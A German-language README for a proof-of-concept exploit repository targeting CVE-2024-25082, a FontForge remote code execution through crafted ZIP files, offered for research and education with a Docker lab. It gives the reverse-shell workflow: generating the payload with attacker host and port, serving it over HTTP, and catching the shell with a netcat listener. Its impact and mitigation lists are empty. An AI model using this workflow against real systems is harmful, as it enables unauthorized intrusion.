
Proof-of-concept-Exploit für CVE-2024-25082, der Remote-Code-Ausführung in FontForge mittels präparierter ZIP-Archive demonstriert. Enthält Payload-Generator, Docker-Labor und technische Dokumentation für Sicherheitsforschung und -bildung.
Proof-of-Concept-Exploit für CVE-2024-25082, eine Schwachstelle, die FontForge betrifft und Remote Code Execution (RCE) durch eine präparierte ZIP-Datei ermöglicht.
Dieses Repository zeigt, wie die Schwachstelle in einer kontrollierten Laborumgebung für Sicherheitsforschung und Bildungszwecke ausgenutzt werden kann.
Die Schwachstelle tritt aufgrund einer fehlerhaften Validierung von Dateien in ZIP-Archiven auf, sodass ein Angreifer beliebige Befehle auf dem Zielsystem ausführen kann.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
Datei Beschreibung
exploit.py Generiert die bösartige ZIP-Nutzlast poc/ Enthält generierte Proof-of-Concept-Dateien writeup.md Technische Erklärung der Schwachstelle
Optionale Tools installieren:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
Dadurch wird eine bösartige exploit.zip-Datei erstellt.
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
Bei Erfolg sollte eine Shell auf dem Zielsystem erlangt werden.
Eine reproduzierbare verwundbare Umgebung wird im Verzeichnis docker/
bereitgestellt.
Beispiel:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Dies ermöglicht sicheres Testen ohne Beeinträchtigung von Produktionssystemen.
Ein Angreifer, der ZIP-Dateien hochladen oder kontrollieren kann, die von der verwundbaren Anwendung verarbeitet werden, kann:
Empfohlene Schritte zur Eindämmung:
Dieses Repository enthält Proof-of-Concept-Code für eine öffentlich bekannt gewordene Schwachstelle.
Der Code wird ausschließlich bereitgestellt für:
Verwenden Sie diesen Code NICHT gegen Systeme ohne ausdrückliche Erlaubnis.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden.
Moamen Elmaghrabi
Cybersecurity-Student
Penetrationstests & Exploit-Entwicklung
Dieses Projekt ist unter der MIT-Lizenz lizenziert.
Weitere Informationen finden Sie in der LICENSE-Datei.